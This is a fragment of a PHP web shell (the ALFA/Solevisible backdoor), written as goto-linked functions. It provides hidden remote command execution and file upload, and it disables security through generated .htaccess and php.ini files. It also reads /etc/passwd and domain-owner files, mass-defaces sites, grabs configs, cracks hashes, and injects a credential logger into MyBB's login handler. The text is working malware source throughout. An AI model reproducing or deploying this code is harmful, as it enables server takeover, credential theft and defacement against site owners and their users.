	Archive file: <input size="50" id="target" type="text" name="file" value="" . $file . "">\xa\x9<input type="submit" name="btn" value=" "></div></form></center><br>"; if ($_POST["alfa5"] == ">>") { echo "<hr><div style="margin-left: 12px;" archive_full="phar://" . $file . "" archive_name="" . basename($file) . "" id="archive_dir_" . $rand_id . "" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>"; echo "<div style="padding: 10px;" id="archive_base_" . $rand_id . "">"; __alfa_open_archive_file($file, $rand_id); echo "</div>"; } echo "</div>"; alfafooter(); } goto Sp5QA; he7vt: function alfacpcrack() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g('cpcrack',null,'dec')">| DeCrypter | </a><a href=javascript:void(0) onclick="g('cpcrack',null,'analyzer')">| Hash Analyzer | </a></h3></center>"; if ($_POST["alfa1"] == "dec") { $algorithms = array("md5" => "MD5", "md4" => "MD4", "sha1" => "SHA1", "sha256" => "SHA256", "sha384" => "SHA384", "sha512" => "SHA512", "ntlm" => "NTLM"); echo "<center><div class="txtfont_header">| DeCrypter |</div><br><br>\xa<form onsubmit="g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">"; foreach ($algorithms as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } echo "</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { $hash_type = $_POST["alfa4"]; $email = "[email protected]"; $code = "7b9fa79f92c3cd96"; $target = "https://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code; $resp = @file_get_contents($target); if ($resp == '') { $get = new AlfaCURL(); $resp = $get->Send($target); } echo __pre() . "<center>"; switch ($resp) { case "CODE ERREUR : 001": echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>"; break; case "CODE ERREUR : 003": echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>"; break; case "CODE ERREUR : 004": echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>"; break; case "CODE ERREUR : 005": echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>"; break; } if (substr($resp, 0, 4) != "CODE" && $resp != '') { echo "<b>Result: <font color='green'>" . $resp . "</font></b>"; } elseif (substr($resp, 0, 4) != "CODE") { echo "<font color='red'>NoT Found</font><br />"; } echo "</center>"; } } } if ($_POST["alfa1"] == "analyzer") { echo "<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>\xa<form onsubmit="g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;">\xa<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { $curl = new AlfaCURL(); $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search"); echo __pre() . "<center>"; if (preg_match("#<fieldset class="trouve">(.*?)</fieldset>#", $resp, $s)) { echo "<font color="green">" . $s[1] . "</font>"; } else { echo "<font color="red">Not Found...!</font>"; } echo "</center><br>"; } } } echo "</div>"; alfafooter(); } goto BhkkX; i_y5V: if (isset($_GET["solevisible"])) { @error_reporting(E_ALL ^ E_NOTICE); echo "<html>"; echo "<title>Solevisible Hidden Shell</title>"; echo "<body bgcolor=#000000>"; echo "<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">" . (function_exists("php_uname") ? php_uname() : "???") . "</font></b></big>"; $safe_mode = @ini_get("safe_mode"); if ($safe_mode) { $r = "<b style='color: red'>On</b>"; } else { $r = "<b style='color: green'>Off</b>"; } echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>"; echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />"; echo "PWD:<font color=#FFFFFF> " . str_replace("\", "/", @alfaGetCwd()) . "/<br />"; echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>"; echo "<font color=#7CFC00>Disable functions : </font>"; $disfun = @ini_get("disable_functions"); if (empty($disfun)) { $disfun = "<font color="green">NONE</font>"; } echo "<font color=red>"; echo "{$disfun}"; echo "</font><br>"; echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists("gethostbyname") ? @gethostbyname($_SERVER["HTTP_HOST"]) : "???") . "</font><br><p>"; echo "<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "CWD: <input type="text" name="cwd" value="" . str_replace("\", "/", @alfaGetCwd()) . "/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>"; if (isset($_FILES["file"])) { if (@move_uploaded_file($_FILES["file"]["tmp_name"], __ZGVjb2Rlcg(@$_POST["cwd"]) . "/" . $_FILES["file"]["name"])) { echo "<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>"; } else { echo "<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>"; } } echo "<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>\xa<hr><pre>"; if (isset($_POST["command_solevisible"])) { if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $separator = "&"; } else { $separator = ";"; } $solevisible = "cd '" . addslashes(str_replace("\", "/", @alfaGetCwd())) . "'" . $separator . '' . __ZGVjb2Rlcg($_POST["command_solevisible"]); echo alfaEx($solevisible); } echo "</pre>
</body></html>"; die; } goto nhViU; BXSlk: @set_time_limit(0); goto Os8cj; pQYlh: function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { if ($ext != "*") { $f = basename($path); $f = explode(".", $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == "str") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\", "/", $path) . "<br>"; } } else { if (strstr($value, $string)) { echo str_replace("\", "/", $path) . "<br>"; } } $results[] = $path; } elseif ($value != "." && $value != "..") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } goto zHgw5; HL3qe: function alfaEx($in, $re = false, $cgi = true, $all = false) { $data = _alfa_php_cmd($in, $re); if (empty($data) && $cgi || $all) { if ($GLOBALS["sys"] == "unix") { if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) { $cmd = _alfa_cgicmd($in); if (!empty($cmd)) { return $cmd; } } } } return $data; } goto KtNd0; rUSPf: @ini_set("log_errors", 0); goto CrZw0; oMz56: function __alfa_set_cookie($key, $value) { $_COOKIE[$key] = $value; @setcookie($key, $value, time() + 86400 * 7, "/"); } goto hId6W; qr6DC: function __alert($s) { echo "<center>" . __pre() . $s . "</center>"; } goto Wo4n0; HVzUJ: if ($GLOBALS["sys"] == "win") { $GLOBALS["home_cwd"] = str_replace("\", "/", $GLOBALS["home_cwd"]); $GLOBALS["cwd"] = str_replace("\", "/", $GLOBALS["cwd"]); } goto FN_bJ; zUXll: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { $res = "<font color='green'>[ Success...! ]</font>"; $err = "<font color='red'>[ Failed...! ]</font>"; if ($evalOptions != '') { $evalOptions = $evalOptions . " "; } if ($evalArguments != '') { $evalArguments = " " . $evalArguments; } if ($evalType == "c") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq . ".c"; $path = $filename; if (__write_file($path, $evalCode)) { $ext = $GLOBALS["sys"] == "win" ? ".exe" : ".out"; $pathres = $filename . $ext; $evalOptions = "-o " . $pathres . " " . $evalOptions; $cmd = "gcc " . $evalOptions . $path; alfaEx($cmd); if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = $pathres . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } elseif ($evalType == "java") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq; $evalCode = "class " . $filename . " { " . $evalCode . " } "; } $path = $filename . ".java"; if (__write_file($path, $evalCode)) { $cmd = "javac " . $evalOptions . $path; alfaEx($cmd); $pathres = $filename . ".class"; if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = "java " . $filename . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } return false; } goto PnxkJ; wK3Iv: function hijackOutput($c = 0, $p = '') { echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : "<center><font color="red">Error in inject code !</font></center>"; } goto pQYlh; eiihp: function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto tWrGE; TWvKj: function alfaSettings() { alfahead(); AlfaNum(6, 7, 8, 9, 10); echo "<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g('settings',null,null,null,null,null,null,null,null,'main')">| Generall Setting | </a></h3></center>"; if ($_POST["alfa8"] == "main") { echo "<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method='post'>"; $lg_array = array("0" => "No", "1" => "Yes"); $penc_array = array("false" => "No", "true" => "Yes"); $protect_html = ''; $icon_html = ''; $postEnc_html = ''; $login_html = ''; $cgiapi_html = ''; foreach ($lg_array as $key => $val) { $protect_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["safemode"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } foreach ($lg_array as $key => $val) { $icon_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["show_icons"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } foreach ($penc_array as $key => $val) { $cgiapi_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa9"]) && $_POST["alfa9"] == $key ? "selected" : ($GLOBALS["DB_NAME"]["cgi_api"] && empty($_POST["alfa9"]) ? "selected" : '')) . ">" . $val . "</option>"; } foreach ($penc_array as $key => $val) { $postEnc_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa7"]) && $_POST["alfa7"] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["alfa7"]) ? "selected" : '')) . ">" . $val . "</option>"; } $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound"); foreach ($lg_array as $key => $val) { $login_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["login_page"] == $key ? "selected" : '') . ">" . $val . "</option>"; } echo ''; echo "<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">" . $protect_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">" . $cgiapi_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">" . $postEnc_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">" . $icon_html . "</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">" . $login_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="" . (empty($_POST["alfa3"]) ? $GLOBALS["DB_NAME"]["user"] : $_POST["alfa3"]) . "" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="" . $GLOBALS["DB_NAME"]["safemode"] . ""><input type="hidden" name="s" value="" . $GLOBALS["DB_NAME"]["show_icons"] . ""><p><input type="submit" name="btn" value=" "></p></form></center>"; if ($_POST["alfa5"] == ">>") { echo __pre(); if (!empty($_POST["alfa3"])) { $protect = $_POST["alfa1"]; $lgpage = $_POST["alfa2"]; $username = $_POST["alfa3"]; $password = md5($_POST["alfa4"]); $icon = $_POST["alfa6"]; $post_encrypt = $_POST["alfa7"]; $cgi_api_val = $_POST["alfa9"]; @chdir($GLOBALS["home_cwd"]); $basename = @basename($_SERVER["PHP_SELF"]); $data = @file_get_contents($basename); $user_rand = $GLOBALS["DB_NAME"]["user_rand"]; $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"]; $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"]; $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"]; $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"]; $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"]; $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"]; $find_user = "/'" . $user_rand . "'(.*?),/i"; $find_pw = "/'" . $pass_rand . "'(.*?),/i"; $find_lg = "/'" . $login_page_rand . "'(.*?),/i"; $find_p = "/'" . $safemode_rand . "'(.*?),/i"; $icons = "/'" . $show_icons_rand . "'(.*?),/i"; $postEnc = "/'" . $post_encryption_rand . "'(.*?),/i"; $cgi_api_reg = "/'" . $cgi_api_rand . "'(.*?),/i"; if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "'" . $user_rand . "' => '" . $username . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($_POST["alfa4"]) && preg_match($find_pw, $data, $e)) { $new = "'" . $pass_rand . "' => '" . $password . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "'" . $login_page_rand . "' => '" . $lgpage . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "'" . $safemode_rand . "' => '" . $protect . "',"; $data = str_replace($e[0], $new, $data); } if (preg_match($icons, $data, $e)) { $new = "'" . $show_icons_rand . "' => '" . $icon . "',"; $data = str_replace($e[0], $new, $data); } if (preg_match($postEnc, $data, $e)) { $new = "'" . $post_encryption_rand . "' => " . $post_encrypt . ","; $data = str_replace($e[0], $new, $data); } if (preg_match($cgi_api_reg, $data, $e)) { $new = "'" . $cgi_api_rand . "' => " . $cgi_api_val . ","; $data = str_replace($e[0], $new, $data); } if (@file_put_contents($basename, $data)) { echo "<b>UserName: </b><font color="green"><b>" . $username . "</b></font><br /><b>Password: </b><font color="green"><b>" . $_POST["alfa4"] . "</b></font><script>post_encryption_mode = " . $post_encrypt . ";</script>"; } else { __alert("<span style='color:red;'>File has no edit access...!</span>"); } } else { __alert("<span style='color:red;'>UserName is Empty !</span>"); } } } elseif ($_POST["alfa8"] == "color") { echo "<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method='post'>"; echo "<table border="1"><tbody>"; $template = "<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>"; $x = 1; foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { $multi = ''; if (is_array($value)) { if (isset($value["multi_selector"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } $value = alfa_getColor($key); $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key)); echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template); } echo "<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>"; echo "</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$('importFileBtn').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g('settings',null,null,null,null,null,null,null,'export','color')" class="button"> Export </button></center></p>"; if ($_POST["alfa7"] == "export") { echo __pre(); $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array(); $glob_colors = $GLOBALS["__ALFA_COLOR__"]; $array = array(); foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array[$k] = $v; } $file = "alfa_color_config_" . date("Y-m-d-h_i_s") . ".conf"; $config = json_encode($array, JSON_PRETTY_PRINT); if (!@file_put_contents($file, $config)) { echo "<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">" . $config . "</textarea></center></p>"; } else { echo "<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'" . $file . "', 'download')"><font color="#0F0">Download Config</font></a></center></p></h3>"; } } if ($_POST["alfa2"] == ">>") { echo __pre(); $colors = json_decode($_POST["alfa1"], true); $array = ''; $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false; $glob_colors = $GLOBALS["__ALFA_COLOR__"]; foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array .= """ . trim($k) . "" => "" . $v . "","; } @chdir($GLOBALS["home_cwd"]); $basename = @basename($_SERVER["PHP_SELF"]); $data = @file_get_contents($basename); $color = "/'color'(.*?)\),/s"; if (preg_match($color, $data, $e)) { $new = "'color' => array(" . $array . "),"; $data = str_replace($e[0], $new, $data); if (@file_put_contents($basename, $data)) { echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>"; } else { echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>"; } } else { echo "<center><p><h3>[-] Error...!</h3></p></center>"; } } } echo "</div>"; alfafooter(); } goto YNiqE; K5MFn: $GLOBALS["DB_NAME"] = $GLOBALS["oZgNypoPRU"]; goto r05Ia; i8Olb: $xd .= "Site : " . $_SERVER["HTTP_HOST"] . "
"; goto FRkec; IGhSm: function _alfa_is_writable($file) { $check = false; $check = @is_writable($file); if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("[ -w "" . trim(addslashes($file)) . "" ] && echo "yes" || echo "no""); if ($check == "yes") { $check = true; } else { $check = false; } } } return $check; } goto HZNvy; ar_2Q: function alfasafe() { alfahead(); echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>"; echo "<h3><a href=javascript:void(0) onclick="g('safe',null,'php.ini',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g('safe',null,null,'ini')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,'pl')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,'passwd')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,'users')">| Read-Users | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,'valiases')">| Get-User | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,null,null,'domains')">| Get-Domains | </a></center></h3>"; if (!empty($_POST["alfa8"]) && isset($_POST["alfa8"]) == "domains") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { echo __pre(); $solevisible9 = _alfa_file("/etc/named.conf"); if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("zone", $solevisible13)) { preg_match_all("#zone "(.*)"#", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . "<br>"; } } } } } else { echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); if (is_array($users)) { foreach ($users as $boz) { $dom = explode(":", $boz); echo $dom[0] . "
"; } } } } if (!empty($_POST["alfa6"]) && isset($_POST["alfa6"]) == "valiases") { echo "
<form onsubmit="g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>"; if (isset($_POST["alfa9"]) && $_POST["alfa9"] == ">>") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { $site = trim($_POST["alfa7"]); $rep = str_replace(array("https://", "http://", "www."), '', $site); $user = ''; if (function_exists("posix_getpwuid") && function_exists("fileowner")) { if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) { $user = $user["name"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep); } } if (!empty($user) && $user != "root") { echo __pre() . "<center><table border='1'><tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">{$user}</font></b></td></tr><tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; } else { echo __pre() . "<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>"; } } else { $site = trim($_POST["alfa7"]); $rep = str_replace(array("https://", "http://", "www."), '', $site); $users = _alfa_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $ex = explode(":", $boz); if ($ex[0] == $rep) { echo __pre() . "<center><table border='1'>\xa<tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">" . trim($ex[1]) . "</font></b></td></tr>
<tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; break; } } } } } if (!empty($_POST["alfa5"]) && isset($_POST["alfa5"])) { if (!_alfa_file_exists("/etc/virtual/domainowners")) { echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\xa"; break; } } $i++; } } else { echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $user = explode(":", $boz); echo trim($user[1]) . "<br>"; } } } if (!empty($_POST["alfa4"]) && isset($_POST["alfa4"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("/etc/passwd"); } elseif (function_exists("posix_getpwuid")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}:"; } echo "\xa"; } } } else { __alert("failed..."); } } if (!empty($_POST["alfa2"]) && isset($_POST["alfa2"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible
<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off\xa</IfModule>"); echo "<center><b><big>htaccess for Apache created...!</center></b></big>"; } if (!empty($_POST["alfa1"]) && isset($_POST["alfa1"])) { @__write_file($GLOBALS["cwd"] . "php.ini", "safe_mode=OFF\xadisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)"); echo "<center><b><big> php.ini created...!</center></b></big>"; } if (!empty($_POST["alfa3"]) && isset($_POST["alfa3"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\xa<Files *.php>
ForceType application/x-httpd-php4\xa</Files>\xa<IfModule mod_security.c>\xaSecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"); echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>"; } echo "<br></div>"; alfafooter(); } goto EoAWA; K8RV4: function alfaMassDefacer() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit="g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;" method='post'>"; echo "<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>\xa	Mass dir: <input size="50" id="target" type="text" name="massdir" value="" . htmlspecialchars($GLOBALS["cwd"]) . "">
\x9DefPage: <input size="50" type="text" name="defpage" value="" . htmlspecialchars($GLOBALS["cwd"]) . ""></div> <input type="submit" name="btn" value=" "></center></p>
</form>"; $dir = $_POST["alfa1"]; $defpage = $_POST["alfa2"]; $method = $_POST["alfa3"]; $fCurrent = $GLOBALS["__file_path"]; if ($_POST["alfa4"] == ">>") { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { echo __pre(); while (($file = @readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . $file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { if (!@is_writable($newfile)) { continue; } if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } else { __alert("<font color="red">Error In OpenDir...</font>"); } } else { __alert("<font color="red">DefPage File NotFound...</font>"); } } else { __alert("<font color="red">Directory is not Readable...</font>"); } } else { __alert("<font color="red">Mass Dir is Invalid Dir...</font>"); } } else { __alert("<font color="red">Dir is Empty...</font>"); } } echo "</div>"; alfafooter(); } goto Xrfh9; L6Kl6: function _AlfaSecretKey() { $secret = @$_COOKIE["AlfaSecretKey"]; if (!isset($_COOKIE["AlfaSecretKey"])) { $secret = uniqid(mt_rand(), true); __alfa_set_cookie("AlfaSecretKey", $secret); } return $secret; } goto PuSe1; KtNd0: function _alfa_php_cmd($in, $re = false) { $out = ''; try { if ($re) { $in = $in . " 2>&1"; } if (function_exists("exec")) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("shell_exec")) { $out = shell_exec($in); } elseif (function_exists("popen") && function_exists("pclose")) { if (is_resource($f = @popen($in, "r"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } } elseif (function_exists("proc_open")) { $pipes = array(); $process = @proc_open($in . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists("COM")) { $alfaWs = new COM("WScript.shell"); $exec = $alfaWs->exec("cmd.exe /c " . $_POST["alfa1"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } goto GIU6h; qpgQy: function hijackMybb($path, $saveto) { $code = "$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = '".$user['username']."'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user['username']." : ". $user['password']." ( ".$alfa_fetch['email']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);"; $find = "$loginhandler->complete_login();"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/member.php"; $evil_login = "	" . $code . "
	" . $find; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L8sC_; dptXn: if (!function_exists("mb_strlen")) { function mb_strlen($str, $c = '') { return strlen($str); } } goto JM3pb; P95rf: function alfaconfig_grabber() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>"; echo "<form name="srch" onSubmit="g('config_grabber',null,null,this.dir.value,this.ext.value,null,'>>');return false;" method='post'>\xa\x9<div class="txtfont">\xa	Dir: <input size="50" id="target" type="text" name="dir" value="" . $GLOBALS["cwd"] . "">
	Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
